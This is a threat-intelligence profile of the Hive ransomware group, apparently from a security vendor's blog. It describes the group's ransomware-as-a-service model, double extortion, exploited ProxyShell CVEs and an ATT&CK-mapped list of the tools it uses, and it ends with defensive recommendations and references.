Hive Ransomware Group

By Suleyman Ozarslan, PhD & Picus Labs August 22, 2022 Ransomware

Hive ransomware began operations in June 2021 and quickly drew law enforcement attention by striking a wide range of sectors, with healthcare among the most impacted. The group runs a Ransomware as a Service programme, recruiting affiliates to conduct intrusions at scale. Hive uses double extortion, stealing sensitive data before encryption to maximise leverage. When victims refuse to pay, operators publish exfiltrated files on Hive’s data leak sites to pressure organisations and damage reputations. The operation maintains multiple ransomware builds that target Windows, Linux, FreeBSD, and VMware ESXi, enabling cross platform impact in mixed enterprise environments.

Affiliates typically gain initial access through phishing, stolen credentials, exposed remote services, or exploitation of known vulnerabilities. Once inside, they perform discovery, move laterally, and escalate privileges using common admin tools and living off the land techniques. Backups and shadow copies are often disabled or removed to hinder recovery, and large data sets are exfiltrated prior to encryption to support the leak site pressure. Notably, recent Hive variants shifted from Go to Rust, a change that improves code safety, complicates analysis, and can help evade some detections. Defenders can reduce risk by enforcing multi factor authentication, hardening and monitoring remote access, rapidly patching internet facing systems, segmenting critical assets, and continuously validating detection and response controls against real attacker techniques to identify and close gaps before an affiliate can weaponise them.

Metadata

Associated Groups	Affiliates - DEV-0237
Associated Country	Russia
First Seen	June 2021
Target Sectors	Automotive, Construction, Education, Energy, Entertainment, Financial Services, Food and Beverage,Government, Hardware, Healthcare, Information Technology, Manufacturing, Real Estate, Retail, Transportation
Target Countries	United States, Argentina, Australia, Brazil, Canada, China, Colombia, El Salvador, France, Germany, India,Italy, Netherlands, Norway, Peru, Portugal, Saudi Arabia, Spain, Switzerland, Taiwan, Thailand, United Kingdom

Modus Operandi

Business Models	Ransomware-as-a-Service (RaaS) Double Extortion Resource Hijacking (Cryptocurrency Mining)
Extortion Tactics	File Encryption Data Leakage
Initial Access Methods	Exploit Public-Facing Application Phishing External Remote Services
Impact Methods	Data Encryption Data Exfiltration

Exploited Applications and Vulnerabilities by Hive

Application	Vulnerability	CVE	CVSS
Microsoft Exchange	ProxyShell RC	CVE-2021-34473	9.8 Critical
Microsoft Exchange	ProxyShell Privilege Escalation	CVE-2021-34523	9.8 Critical
Microsoft Exchange	ProxyShell Security Feature Bypass	CVE-2021-31207	7.2 High

Utilized Tools and Malware by Hive

MITRE ATT&CK Tactic	Tools
Execution	Cobalt Strike PowerShell PSExec Windows Task Scheduler WMI
Persistence	Windows Task Scheduler
Privilege Execution	Mimikatz
Defense Evasion	GMER KillAV PC Hunter
Credential Access	Redline Stealer
Discovery	TrojanSpy.DATASPY
Lateral Movement	BITSAdmin Cobalt Strike PSExec RDP WMI
Command and Control	BITSAdmin
Exflitration	7-zip Anonfiles Mega Sendspace Ufile.io
Impact	Hive ransomware NBMiner cryptocurrency miner

[1] K. Arhart, “Cobalt Strike,” Cobalt Strike Research and Development, Aug. 19, 2021. https://www.cobaltstrike.com/ (accessed Jul. 06, 2022).
[2] S. Özarslan, “MITRE ATT&CK T1086 PowerShell.” https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1086-powershell (accessed Jul. 06, 2022).
[3] “PsExec - Windows Sysinternals.” https://docs.microsoft.com/en-us/sysinternals/downloads/psexec (accessed Jul. 06, 2022).
[4] S. Özarslan, “MITRE ATT&CK T1053 Scheduled Task.” https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-1053-scheduled-task (accessed Jul. 06, 2022).
[5] “Windows Management Instrumentation.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page. [Accessed: Aug. 03, 2022]
[6] “GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security,” GitHub. https://github.com/gentilkiwi/mimikatz (accessed Jul. 06, 2022).
[7] “GMER - Rootkit Detector and Remover.” http://www.gmer.net (accessed Jul. 06, 2022).
[8] F. Fkie, “KillAV (Malware Family).” https://malpedia.caad.fkie.fraunhofer.de/details/win.killav (accessed Jul. 06, 2022).
[9] “PC Hunter,” Dec. 02, 2018. https://www.majorgeeks.com/files/details/pc_hunter.html (accessed Jul. 06, 2022).
[10] F. Fkie, “RedLine Stealer (Malware Family).” https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer (accessed Jul. 06, 2022).
[11] “TrojanSpy.PS1.DATASPY.A.” [Online]. Available: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.ps1.dataspy.a/. [Accessed: Aug. 03, 2022]
[12] “bitsadmin | LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ (accessed Jul. 06, 2022).
[13] Deland-Han, “Understanding Remote Desktop Protocol (RDP) - Windows Server.” [Online]. Available: https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol. [Accessed: Aug. 03, 2022]
[14] “7-Zip.” https://www.7-zip.org (accessed Jul. 06, 2022).
[15] “Anonymous File Upload.” https://anonfiles.com (accessed Jul. 06, 2022).
[16] “MEGA.” https://mega.io/ (accessed Jul. 06, 2022).
[17] “Free large file hosting. Send big files the easy way!” https://www.sendspace.com (accessed Jul. 06, 2022).
[18] “Upload files for free.” https://ufile.io (accessed Jul. 06, 2022).
[19] F. Fkie, “Hive (Malware Family).” https://malpedia.caad.fkie.fraunhofer.de/details/win.hive (accessed Jul. 06, 2022).
[20] “GitHub - NebuTech/NBMiner: GPU Miner for ETH, RVN, BEAM, CFX, ZIL, AE, ERGO,” GitHub. https://github.com/NebuTech/NBMiner (accessed Jul. 06, 2022).

Hive Ransomware Group

Share this article:

Share this article:

Table of Contents

Get the Latest InsightsDelivered Straight to Your Inbox

Get the Latest Insights
Delivered Straight to Your Inbox